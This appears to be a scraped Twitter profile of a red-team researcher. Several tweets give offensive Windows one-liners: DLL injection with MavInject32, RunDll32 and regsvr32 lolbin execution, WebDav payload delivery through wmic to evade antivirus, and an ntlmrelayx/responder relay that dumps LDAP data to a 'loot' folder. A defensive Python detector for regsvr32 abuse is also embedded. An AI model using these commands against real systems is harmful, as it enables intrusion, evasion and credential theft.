dee3

@ditrizna

Red Team, Security Research. Activity is mostly NDA-affected, but sometimes there's something to share. Digging into AI Security when there's a moment.

Joined: August 2016

Tweets


  1. 20 Jan

    Suggest you take a look at this attempt to put several infosec projects together: WebDav, .NET injection, Obfuscation, C&C.. Direct shout-out to for your awesome work, w/ many others rocking 🔥

  2. Retweeted
    14 Dec 2017

    Using MavInject32.exe (Microsoft Corp Signed) to load any dll in a running process. > "C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe" <PID> /INJECTRUNNING <PATH DLL> cc:

  3. 13 Nov 2019

    Cool research and writeup by revealing new NTLM relay vector!

  4. Retweeted
    4 Oct 2019

    I guess everyone knows about this Lolbin: RunDll32.exe shell32.dll,Control_RunDLL c:\test\test.dll but about this one? RunDll32.exe Shell32.dll,Control_RunDLLAsUser c:\test\test.dll

  5. Retweeted
    4 Sep 2019

    It's official, Donut is a Python module. Install with 'pip3 install donut-shellcode'

  6. 2 Jul 2019

    Some AV signatures do not work if you deliver the payload using WebDav, like: wmic os get /format:"\\my.ip@SSL@443\wmic.xsl" BUT.. you need the WebClient service to be running (not by default). Thanks to blog! Enable it from userland with: pushd \\my.ip@SSL@443\fake & popd

  7. Retweeted
    29 May 2019

    When detecting "regsvr32" execution most people focus on things like /u, /i and scrobj.dll. Interestingly, if you create a DLL that exports a function called "DllRegisterServer" you can use regsvr32 to execute it by simply running "regsvr32.exe test.dll".

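A defender-side check for the point made in this tweet, added here as an example and not the tweet author's code: it flags regsvr32 command lines whose module argument sits outside trusted directories, whether or not /u, /i or scrobj.dll appear. The sample command lines and the trusted-directory allow-list are constructed assumptions.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample process-creation command lines (not real telemetry).
SAMPLE_EVENTS = [
    r'C:\Windows\System32\regsvr32.exe /s C:\Windows\System32\msxml6.dll',
    r'regsvr32.exe /s /u /i:http://example.invalid/a.sct scrobj.dll',
    r'regsvr32.exe test.dll',
    r'"C:\Windows\SysWOW64\regsvr32.exe" /s "C:\Program Files\Vendor\plugin.dll"',
    r'notepad.exe C:\Users\Public\test.dll',
]

# Assumed allow-list of directories where registered COM servers normally live.
TRUSTED_DIRS = (
    'c:\\windows\\system32\\',
    'c:\\windows\\syswow64\\',
    'c:\\program files\\',
    'c:\\program files (x86)\\',
)

def split_cmdline(cmdline):
    """Split a Windows command line into tokens, honouring double quotes."""
    return [q or u for q, u in re.findall(r'"([^"]*)"|(\S+)', cmdline)]

def regsvr32_findings(cmdline):
    """None if the image is not regsvr32.exe, else a list of reasons (empty = benign)."""
    tokens = split_cmdline(cmdline)
    if not tokens or PureWindowsPath(tokens[0]).name.lower() != 'regsvr32.exe':
        return None
    switches = [a for a in tokens[1:] if a.startswith('/')]
    modules = [a for a in tokens[1:] if not a.startswith('/')]
    reasons = []
    # The well-known pattern: scriptlet loading via /i:<url> together with scrobj.dll.
    if any(s.lower().startswith('/i:') for s in switches) or \
            any(PureWindowsPath(m).name.lower() == 'scrobj.dll' for m in modules):
        reasons.append('scriptlet-style /i or scrobj.dll')
    # The quieter case from the tweet: any DLL exporting DllRegisterServer runs with
    # no special switches, so judge the module path itself. Bare relative names
    # such as test.dll never start with a trusted directory and are flagged too.
    for m in modules:
        if not m.lower().startswith(TRUSTED_DIRS):
            reasons.append(f'module outside trusted directories: {m}')
    return reasons

def suspicious_regsvr32(events):
    """Reduce a list of command lines to (cmdline, reasons) for flagged regsvr32 runs."""
    return [(cmd, r) for cmd in events if (r := regsvr32_findings(cmd))]

if __name__ == '__main__':
    for cmd, reasons in suspicious_regsvr32(SAMPLE_EVENTS):
        print(cmd, '->', '; '.join(reasons))
```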
  8. 2 May 2019

    PowerShell ISE Filename parsing flaw RCE: Wonder if this would work with hidden files or NTFS ADS :)

  9. 8 Mar 2019

    Why not only SMB, but LDAP signing is important as well. Dump LDAP contents without any AD creds, but with one in the same broadcast domain (responder SMB/HTTP off): sess1> responder -I <eth> sess2> ntlmrelayx -wh test -wa 1 -t ldap://<ad> --no-da --no-acl -l /tmp/loot

  10. 4 Mar 2019
  11. 4 Mar 2019
    This Tweet is unavailable.
